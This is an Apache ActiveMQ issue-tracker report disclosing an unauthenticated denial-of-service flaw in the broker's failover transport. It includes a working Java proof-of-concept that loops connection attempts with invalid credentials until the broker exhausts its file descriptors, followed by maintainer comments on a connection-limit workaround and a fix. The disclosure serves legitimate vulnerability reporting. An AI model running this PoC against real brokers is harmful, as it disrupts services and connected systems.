ActiveMQ
  1. ActiveMQ
  2. AMQ-3294

ActiveMQ failover Denial of Service

    Details

    • Type: Bug Bug
    • Status: Resolved
    • Priority: Major Major
    • Resolution: Fixed
    • Affects Version/s: 5.2.0, 5.5.0
    • Fix Version/s: 5.6.0
    • Component/s: Broker
    • Labels:
    • Environment:

      Linux ubuntu 2.6.32-30-generic and other Linux versions

      Description

      Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service.

      In detail, an attacker can issue multiple ActiveMQ openwire connection requests using the following connection string: 
failover:tcp://<IP>:61616

      Due to the 'failure' mechanism, all TCP connections remain active even if a valid session is not created.
      Please note that no valid credentials have been used.

      After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered causing the freeze/crash of the broker. Connected systems may crash as well.

      During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.

      I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.

      Proof-Of-Concept:

      --------------------
      package openwireclient;

      import javax.jms.*;
      import org.apache.activemq.ActiveMQConnectionFactory;

      public class GoAndCrash {

      private static String url = "failover:tcp://";

      public static void main(String[] args) throws JMSException {

      System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");

      url = url.concat(args[0] + ":" + args[1]);
      int cont = 0;

      while (true) {
      try

      { System.out.println("[*] Request #" + cont); ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser", "invalidPass", url); Connection connection = connectionFactory.createConnection(); cont++; connection.start(); }

      catch (Exception ex)

      { //do nothing }

      }
      }
      }
      --------------------

        Activity

        Hide
        Rob Davies added a comment -

        Fixed by revision 1209700

        Show
        Rob Davies added a comment - Fixed by revision 1209700
        Hide
        Luca Carettoni added a comment -

        Gary, thanks for your follow-up!
        Haven't tested it yet but it looks indeed as a possible workaround - at least to avoid a brutal crash.

        I've just downloaded the latest stable (5.5.0) and it does not include this configuration option in any of the configuration templates. From the security standpoint, it will be great to see this transport option enabled by default with a reasonable value.

        Show
        Luca Carettoni added a comment - Gary, thanks for your follow-up! Haven't tested it yet but it looks indeed as a possible workaround - at least to avoid a brutal crash. I've just downloaded the latest stable (5.5.0) and it does not include this configuration option in any of the configuration templates. From the security standpoint, it will be great to see this transport option enabled by default with a reasonable value.
        Hide
        Gary Tully added a comment -

        https://issues.apache.org/jira/browse/AMQ-1928 helps here, it allows you to limit the number of concurrent connections. Set this to 10 and the DoS attack will fail

        Show
        Gary Tully added a comment - https://issues.apache.org/jira/browse/AMQ-1928 helps here, it allows you to limit the number of concurrent connections. Set this to 10 and the DoS attack will fail
        Hide
        Luca Carettoni added a comment -

        After a few months, any update on this?

        Thanks,
        Luca

        Show
        Luca Carettoni added a comment - After a few months, any update on this? Thanks, Luca

          People

          • Assignee:
            Rob Davies
            Reporter:
            Luca Carettoni
          • Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved:

              Development